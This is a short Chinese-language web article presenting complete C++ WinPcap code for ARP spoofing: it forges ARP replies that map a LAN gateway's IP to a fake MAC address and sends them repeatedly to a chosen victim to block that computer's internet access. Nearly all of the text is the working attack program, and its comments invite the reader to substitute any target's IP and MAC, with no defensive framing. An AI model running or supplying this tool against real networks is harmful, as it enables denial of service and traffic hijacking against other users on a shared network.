發(fā)arp應(yīng)答包欺騙別人

發(fā)布時(shí)間：2020-07-19 12:00:11 來源：網(wǎng)絡(luò) 閱讀：352 作者：1406404014 欄目：網(wǎng)絡(luò)安全

通過對方的mac地址和ip地址用程序?qū)崿F(xiàn)對其他電腦阻止上網(wǎng)，以下是實(shí)現(xiàn)代碼：

// WinpCap Test.cpp : 定義控制臺應(yīng)用程序的入口點(diǎn)。

#include "stdafx.h"

#include <pcap.h>

int _tmain(int argc, _TCHAR* argv[])

{

pcap_if_t * allAdapters;//適配器列表

pcap_if_t * adapter;

pcap_t * adapterHandle;//適配器句柄

u_char packet[ 1020 ]; //待發(fā)送的數(shù)據(jù)封包

char errorBuffer[ PCAP_ERRBUF_SIZE ];//錯(cuò)誤信息緩沖區(qū)

if( pcap_findalldevs_ex( PCAP_SRC_IF_STRING, NULL, &allAdapters, errorBuffer ) == -1 )

{//檢索機(jī)器連接的所有網(wǎng)絡(luò)適配器

fprintf( stderr, "Error in pcap_findalldevs_ex function: %s\n", errorBuffer );

return -1;

}

if( allAdapters == NULL )

{//不存在任何適配器

printf( "\nNo adapters found! Make sure WinPcap is installed.\n" );

return 0;

}

int crtAdapter = 0;

for( adapter = allAdapters; adapter != NULL; adapter = adapter->next)

{//遍歷輸入適配器信息(名稱和描述信息)

printf( "\n%d.%s ", ++crtAdapter, adapter->name );

printf( "-- %s\n", adapter->description );

}

printf( "\n" );

//選擇適配器

int adapterNumber;

printf( "Enter the adapter number between 1 and %d:", crtAdapter );

scanf_s( "%d", &adapterNumber );

if( adapterNumber < 1 || adapterNumber > crtAdapter )

{

printf( "\nAdapter number out of range.\n" );

pcap_freealldevs( allAdapters );// 釋放適配器列表

return -1;

}

adapter = allAdapters;

for( crtAdapter = 0; crtAdapter < adapterNumber - 1; crtAdapter++ )

adapter = adapter->next;

// 打開指定適配器

adapterHandle = pcap_open( adapter->name, // name of the adapter

65536, // portion of the packet to capture

// 65536 guarantees that the whole

// packet will be captured

PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode

1000, // read timeout - 1 millisecond

NULL, // authentication on the remote machine

errorBuffer // error buffer

);

if( adapterHandle == NULL )

{//指定適配器打開失敗

fprintf( stderr, "\nUnable to open the adapter\n", adapter->name );

// 釋放適配器列表

pcap_freealldevs( allAdapters );

return -1;

}

pcap_freealldevs( allAdapters );//釋放適配器列表

//創(chuàng)建數(shù)據(jù)封包

packet[0] = 0xc8; packet[1] = 0x9c; packet[2] = 0xdc; packet[3] = 0x22; packet[4] = 0x6c; packet[5] = 0x58; // 被騙計(jì)算機(jī)的mac地址

packet[6] = 0xc8; packet[7] = 0x9c; packet[8] = 0xdc; packet[9] = 0x22; packet[10] = 0x62; packet[11] = 0x0f; // 自己的mac地址

packet[12] = 0x08; packet[13] = 0x06; // 以太網(wǎng)封裝arp協(xié)議（不用動(dòng)）

packet[14] = 0x00; packet[15] = 0x01; // arp第1字段：代表以太網(wǎng)

packet[16] = 0x08; packet[17] = 0x00; // arp第2字段：代表IP協(xié)議

packet[18] = 0x06; // arp第3字段：代表第二層地址的長度

packet[19] = 0x04; // arp第4字段：代表第三層地址的長度

packet[20] = 0x00; packet[21] = 0x02; // arp第5字段:這是一個(gè)arp應(yīng)答報(bào)文; 下面的是arp的第6，7，8，9字段

packet[22] = 0xc8; packet[23] = 0x9c; packet[24] = 0xdc; packet[25] = 0x22; packet[26] = 0x62; packet[27] = 0x06; // 假的網(wǎng)關(guān)地址，

packet[28] = 0xac; packet[29] = 0x1c; packet[30] = 0x0f; packet[31] = 0xfe; // 網(wǎng)關(guān)的ip，這里是172.28.15.254（在本實(shí)驗(yàn)室不用改）

packet[32] = 0xc8; packet[33] = 0x9c; packet[34] = 0xdc; packet[35] = 0x22; packet[36] = 0x6c; packet[37] = 0x58; // 被騙計(jì)算機(jī)的mac地址

packet[38] = 0xac; packet[39] = 0x1c; packet[40] = 0x0f; packet[41] = 0x13; // 被騙計(jì)算機(jī)的IP地址，這里是172.28.15.19 (想騙誰，這里就改成誰的IP)

//發(fā)送數(shù)據(jù)封包

for(int ssde=0;ssde<100;ssde++)

{

pcap_sendpacket( adapterHandle, packet, 42);

Sleep(1000);

}

system( "PAUSE" );

return 0;

}

根據(jù)程序注釋修改mac地址和ip地址即可實(shí)現(xiàn)。

向AI問一下細(xì)節(jié)

發(fā)arp應(yīng)答包欺騙別人

猜你喜歡

最新資訊

相關(guān)推薦

相關(guān)標(biāo)簽